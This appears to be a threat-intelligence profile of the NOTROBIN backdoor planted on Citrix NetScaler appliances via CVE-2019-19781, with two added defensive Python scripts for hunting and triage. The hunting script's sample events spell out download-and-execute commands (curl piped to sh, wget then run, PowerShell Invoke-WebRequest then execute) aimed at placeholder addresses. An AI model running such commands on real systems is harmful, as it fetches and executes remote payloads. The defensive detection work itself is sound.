NOTROBIN
NOTROBIN is a backdoor deployed on Citrix ADC/Gateway (NetScaler) appliances compromised through CVE-2019-19781, an unauthenticated remote code execution flaw. FireEye reported that threat actors exploiting the vulnerability installed NOTROBIN and then applied mitigation steps intended to block subsequent exploitation by other attackers. This is a form of adversary patching: the backdoor removed competing web shells and altered appliance components so that only the intruder, presenting a secret key, could regain access. The result is an appliance that appears patched but remains under the attacker's control. NOTROBIN is described as a backdoor trojan and is listed among notable Linux malware discoveries. With high confidence it is tied to the Citrix NetScaler/ADC exploitation waves of early 2020, which affected internet-facing enterprise and government environments running vulnerable appliances. The sources summarized here do not include file hashes, domains, or other concrete IOCs for NOTROBIN.
Vulnerabilities exploited
One CVE is correlated with this family across public research and vendor advisories, CVE-2019-19781. The supporting source excerpt follows.
“A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products... The vulnerability has been assigned CVE ID CVE-2019-19781... Meanwhile, according to FireEye research threat actors were actively targeting vulnerable Citrix installations to install malware and perform the mitigation steps to prevent subsequent exploitation attempts. The payload used by the threat actor is named NOTROBIN... By the end of January 2020, Citrix had released patches for all products... At the time of writing several exploits have already been released to the public.”
Techniques & procedures
Five distinct techniques are documented for this family, organized by ATT&CK tactic. The source excerpts that support each tactic are given below.
Initial Access (1 technique)
“Cyber actors continue to exploit publicly known—and often dated—software vulnerabilities… Four of the most targeted vulnerabilities in 2020 affected remote work, VPNs, or cloud-based technologies.”
“CVE-2019-19781… exploitation enables the actors to perform unauthorized RCE on a target system.”
Execution (2 techniques)
Attackers can use this functionality to upload/execute command and control (C2) software (webshell or reverse-shell executable) using embedded commands (e.g., curl, wget, Invoke-WebRequest).
A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products... Exploiting the vulnerability could allow an unauthenticated attacker to perform arbitrary code execution on the Citrix appliance.
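A hunting check for the download-and-execute pattern named in the Execution excerpt above (curl, wget, Invoke-WebRequest used to fetch and run a web shell or reverse-shell binary), added here as an example; it is not code from the page's sources, FireEye, or Mallory. It runs over constructed process-creation events: the host names, user names and 198.51.100.x documentation addresses are invented for illustration, and the scoring rule (a downloader chained into an execution step in the same command line is high, a bare downloader is low) is the editor's, not a published rule.

```python
"""Flag download-and-execute command lines in process-creation telemetry.

Added example, not from the NOTROBIN page or its sources. Sample events are
constructed; addresses come from the 198.51.100.0/24 documentation range.
"""
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Constructed sample events: (host, user, command line)
SAMPLE_EVENTS = [
    ("ns-gw-01", "nobody", "curl -s http://198.51.100.10/x.sh | sh"),
    ("ns-gw-01", "nobody",
     "wget -q -O /tmp/.a http://198.51.100.10/a && chmod +x /tmp/.a && /tmp/.a"),
    ("ns-gw-02", "root",
     "curl -fsSL https://updates.example.internal/patch.tgz -o /var/tmp/patch.tgz"),
    ("win-jump-01", "CORP\\svc",
     "powershell -nop -w hidden -c \"Invoke-WebRequest http://198.51.100.10/p.ps1 "
     "-OutFile C:\\Users\\Public\\p.ps1; & C:\\Users\\Public\\p.ps1\""),
    ("ns-gw-02", "nsroot", "ls -la /netscaler/portal/scripts"),
]

# Tools the excerpt names, plus two common Windows equivalents.
DOWNLOADER = re.compile(r"\b(?:curl|wget|Invoke-WebRequest|iwr|certutil(?:\.exe)?)\b", re.IGNORECASE)
# Fetched content piped straight into an interpreter.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:sh|bash|zsh|dash)\b")
INVOKE_EXPR = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE)
# Output path given to the downloader; if it reappears later in the same
# command line, the downloaded file was chmod'ed or executed in one step.
OUTPATH = re.compile(r"(?:-OutFile|-O|-o)\s+(\S+)", re.IGNORECASE)


@dataclass
class Finding:
    host: str
    user: str
    command: str
    severity: str          # "high" or "low"
    reasons: Tuple[str, ...]


def classify(command: str) -> Optional[Tuple[str, Tuple[str, ...]]]:
    """Return (severity, reasons) for a command line, or None if no downloader is present."""
    if not DOWNLOADER.search(command):
        return None
    reasons = []
    if PIPE_TO_SHELL.search(command):
        reasons.append("download piped directly into a shell")
    if INVOKE_EXPR.search(command):
        reasons.append("Invoke-Expression applied to fetched content")
    for m in OUTPATH.finditer(command):
        path = m.group(1).rstrip(";\"')")
        if command.count(path) >= 2:
            reasons.append(f"downloaded file {path} executed in the same command line")
            break
    if reasons:
        return "high", tuple(reasons)
    return "low", ("downloader invoked without an execution step in the same command line",)


def hunt(events):
    """Run classify() over (host, user, command) tuples and collect findings."""
    findings = []
    for host, user, cmd in events:
        result = classify(cmd)
        if result is not None:
            severity, reasons = result
            findings.append(Finding(host, user, cmd, severity, reasons))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.severity:4}] {f.host} {f.user}: {f.command}")
        for r in f.reasons:
            print(f"        - {r}")
```

The check deliberately looks only within a single command line, so a two-stage fetch (download in one process, execute in a later one) surfaces as a low-severity downloader hit; correlate those with the next process creations from the same parent before dismissing them. On an appliance such as a Citrix ADC, any outbound fetch by the web server's service account is unexpected regardless of severity.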
Persistence (1 technique)
No supporting source excerpt is recorded on this page for this tactic.
IOCs tracked for this family
One indicator (IP, domain, or DNS infrastructure linked to this family) is attributed across vendor reports, sandbox runs, and researcher write-ups; its value is not reproduced on this page.
Recent activity
Seven sources are tracked across advisories, community write-ups, and news. What each contributes:
Backdoor observed in the Citrix NetScaler/ADC CVE-2019-19781 exploitation wave; removes competing webshells and modifies components to allow only the operator (with a secret key) to re-enter, leaving systems appearing patched but still compromised.
A source that names NOTROBIN as a malware/tool without further description.
Backdoor malware targeting Linux servers, known for removing competing malware and maintaining persistence.
NOTROBIN is a payload deployed on vulnerable Citrix systems after exploitation of CVE-2019-19781. Threat actors installed it on compromised Citrix appliances and used it to block subsequent exploitation attempts by others.
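A triage check for the "appears patched but still compromised" condition described in the entries above, added here as an example; it is not part of the page or its sources. The appliance inventory, change-management records and exploitation-attempt sightings are constructed, and the decision rule (a mitigation that no defender recorded applying, or one that appeared only after exploitation attempts had already reached the host, is treated as suspect rather than as proof of a clean appliance) is the editor's, not a published detection.

```python
"""Triage appliances that show the CVE-2019-19781 mitigation as present.

Added example, not from the NOTROBIN page or FireEye's report. Hosts, times and
records below are constructed. Rationale: an adversary that installs a backdoor
and then applies the vendor mitigation leaves a host that looks mitigated, so
the presence of the mitigation alone must not close the case.
"""
from datetime import datetime, timezone


def ts(s: str) -> datetime:
    """Parse an ISO-8601 timestamp as UTC."""
    return datetime.fromisoformat(s).replace(tzinfo=timezone.utc)


# Constructed inventory: host -> time the mitigation was first observed present (None = absent)
MITIGATION_OBSERVED = {
    "ns-gw-01": ts("2020-01-11T03:12:00"),
    "ns-gw-02": ts("2020-01-09T14:00:00"),
    "ns-gw-03": ts("2020-01-09T14:05:00"),
    "ns-gw-04": None,
}

# Constructed change-management records: (host, applied_by, applied_at)
CHANGE_RECORDS = [
    ("ns-gw-02", "netops", ts("2020-01-09T13:55:00")),
    ("ns-gw-03", "netops", ts("2020-01-09T14:00:00")),
]

# Constructed exploitation-attempt sightings from perimeter logs: (host, seen_at)
EXPLOIT_ATTEMPTS = [
    ("ns-gw-01", ts("2020-01-10T22:40:00")),   # before the mitigation appeared, no change record
    ("ns-gw-03", ts("2020-01-10T01:00:00")),   # after a recorded mitigation
    ("ns-gw-04", ts("2020-01-10T23:10:00")),   # host never mitigated
]


def triage(mitigation_observed, change_records, exploit_attempts):
    """Return {host: (verdict, reason)} for every host in the inventory."""
    recorded = {host: (who, when) for host, who, when in change_records}
    attempts = {}
    for host, when in exploit_attempts:
        attempts.setdefault(host, []).append(when)

    verdicts = {}
    for host, observed in mitigation_observed.items():
        first_attempt = min(attempts.get(host, []), default=None)
        if observed is None:
            if first_attempt is not None:
                verdicts[host] = ("unmitigated-targeted",
                                  "no mitigation present and exploitation attempts seen")
            else:
                verdicts[host] = ("unmitigated", "no mitigation present")
        elif host not in recorded:
            # Mitigation exists but nobody on the defending side applied it.
            verdicts[host] = ("suspect",
                              "mitigation present with no change record; possible adversary patching")
        elif first_attempt is not None and first_attempt < observed:
            # Attackers reached the host before it was protected; the mitigation may be theirs.
            verdicts[host] = ("suspect",
                              "exploitation attempts preceded the mitigation; verify the host forensically")
        else:
            who, _ = recorded[host]
            verdicts[host] = ("mitigated", f"applied by {who} before any observed attempt")
    return verdicts


if __name__ == "__main__":
    for host, (verdict, reason) in sorted(triage(MITIGATION_OBSERVED, CHANGE_RECORDS, EXPLOIT_ATTEMPTS).items()):
        print(f"{host}: {verdict} ({reason})")
```

Every "suspect" host needs a forensic check of the appliance itself, not a rescan for the vulnerability: a backdoor that admits only requests carrying its secret key will pass an external vulnerability scan as if the host were clean.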